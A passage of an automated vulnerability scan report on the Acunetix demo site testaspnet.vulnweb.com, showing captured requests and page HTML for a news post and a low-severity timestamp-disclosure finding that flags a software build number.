          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP1p3RBAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/M3rUCxcfpdy3AdSqGMGh3aLpuYg==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          190515149
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        2. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          190515149, which evaluates to: 1976-01-15 08:52:29

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 22752
          
          
          Response body (22752 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYW